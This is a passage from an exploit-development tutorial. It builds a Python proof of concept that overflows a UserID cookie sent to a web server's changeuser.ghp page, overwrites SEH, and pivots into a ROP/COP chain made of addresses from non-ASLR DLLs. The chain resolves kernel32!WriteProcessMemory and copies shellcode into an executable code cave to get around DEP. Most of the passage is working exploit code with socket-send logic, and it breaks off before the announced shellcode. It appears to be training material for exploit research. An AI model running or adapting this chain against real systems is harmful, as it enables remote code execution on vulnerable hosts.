crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently holds the address of the nSize parameter placeholder
# Need to first extract the ImageLoad.dll IAT pointer (which is a pointer into kernel32.dll) and then calculate the offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 so that it holds the address of the kernel32!WriteProcessMemory parameter placeholder (the overwrite gadget writes at an offset of ECX+0x8, which is compensated for later with 0x8 more decrements)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset in EDX from EAX - placing the result in EAX
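The four steps, including the padding that retn 0x10 requires, can be traced with a tiny emulator. This is a sketch under stated assumptions: it models only the instructions named in the gadget comments, treats the chain as a list of DWORDs, and starts from an invented EAX value standing in for the leaked kernel32!GetStartupInfoA pointer.

```python
MASK32 = 0xFFFFFFFF
XOR_EDX_EDX = 0x10022c4c   # xor edx, edx ; ret
POP_EBX = 0x100141c8       # pop ebx ; ret
ADD_EDX_EBX = 0x10022c1e   # add edx, ebx ; pop ebx ; retn 0x10
SUB_EAX_EDX = 0x10015ce5   # sub eax, edx ; ret
PAD = 0x90909090

chain = [XOR_EDX_EDX, POP_EBX, 0xfffffd2d, ADD_EDX_EBX, PAD,
         SUB_EAX_EDX, PAD, PAD, PAD, PAD]


def run_routine(eax, chain):
    """Walk the chain DWORD by DWORD; `sp` is an index standing in for ESP."""
    regs = {"eax": eax & MASK32, "ebx": 0, "edx": 0}
    sp = 0
    skip_after_ret = 0
    while sp < len(chain):
        gadget = chain[sp]          # ret / retn pops the next gadget address
        sp += 1 + skip_after_ret    # retn imm16 then discards imm16 bytes
        skip_after_ret = 0
        if gadget == XOR_EDX_EDX:
            regs["edx"] = 0
        elif gadget == POP_EBX:
            regs["ebx"] = chain[sp]
            sp += 1
        elif gadget == ADD_EDX_EBX:
            regs["edx"] = (regs["edx"] + regs["ebx"]) & MASK32
            regs["ebx"] = chain[sp]     # pop ebx consumes one padding DWORD
            sp += 1
            skip_after_ret = 0x10 // 4  # applied after the next address is popped
        elif gadget == SUB_EAX_EDX:
            regs["eax"] = (regs["eax"] - regs["edx"]) & MASK32
        else:
            raise ValueError("unexpected chain entry: %#x" % gadget)
    return regs


regs = run_routine(0x76D01000, chain)  # hypothetical leaked pointer
print(hex(regs["eax"]), hex(regs["edx"]))
```

Note where the four padding DWORDs sit: retn 0x10 pops the address of the sub eax, edx gadget first and only then skips 0x10 bytes, which is why the compensation comes after that gadget rather than before it.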

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32!WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you recall, we already decremented ECX so that it contains the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write writes to ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!
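
For reference, the block of dwords the chain has been patching is laid out the way a call to WriteProcessMemory expects to find it on the stack. The sketch below packs that layout using the static values from this PoC. The function address and lpBuffer are hypothetical stand-ins, since the chain computes them at runtime, and `wpm_frame` is a name made up for this illustration.

```python
import struct

def wpm_frame(func_addr, ret_addr, h_process, base_addr, buf_addr, size, written_ptr):
    """Pack a fake call frame: function pointer, return address, then the five arguments."""
    fields = (func_addr, ret_addr, h_process, base_addr, buf_addr, size, written_ptr)
    return b"".join(struct.pack("<L", field) for field in fields)

frame = wpm_frame(
    func_addr=0x41414141,    # hypothetical: resolved kernel32!WriteProcessMemory address
    ret_addr=0x61C72530,     # code cave in sqlite3.dll, executed after the call returns
    h_process=0xFFFFFFFF,    # pseudo handle for the current process
    base_addr=0x61C72530,    # lpBaseAddress: where the shellcode is copied to
    buf_addr=0x42424242,     # hypothetical: stack address of the shellcode
    size=0x180,              # nSize, as calculated by the chain
    written_ptr=0x1004D740,  # lpNumberOfBytesWritten: a writable address
)
print(len(frame))  # 28 bytes: 7 dwords
```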

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)
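
The effect of these three steps can be traced with a toy model of the registers and the stack. This is only a sketch: the stack addresses and the kernel32!WriteProcessMemory address are invented for illustration, and nothing here touches a real process.

```python
# Toy model: the stack is a dict of address -> dword, registers are a dict.
PLACEHOLDER = 0x0012F000   # hypothetical stack slot that now holds the function pointer
WPM = 0x76A41507           # hypothetical kernel32!WriteProcessMemory address

stack = {PLACEHOLDER: WPM, PLACEHOLDER + 4: 0x61C72530}
regs = {"eax": 0, "ecx": PLACEHOLDER - 8, "esp": 0x0012F400, "eip": 0}

for _ in range(8):                   # eight `inc ecx` gadgets
    regs["ecx"] += 1                 # the `add al, 0x39` side effect is overwritten next
regs["eax"] = regs["ecx"]            # mov eax, ecx
regs["eax"], regs["esp"] = regs["esp"], regs["eax"]   # xchg eax, esp

regs["eip"] = stack[regs["esp"]]     # ret: pop the dword at ESP into EIP
regs["esp"] += 4

# EIP is now the function, and ESP points at the return address (the code cave).
print(hex(regs["eip"]), hex(stack[regs["esp"]]))
```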

Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for the ROP gadget that moves EAX into ECX and ends with "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract the ImageLoad.dll IAT pointer (which is a pointer into kernel32) and then calculate the offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
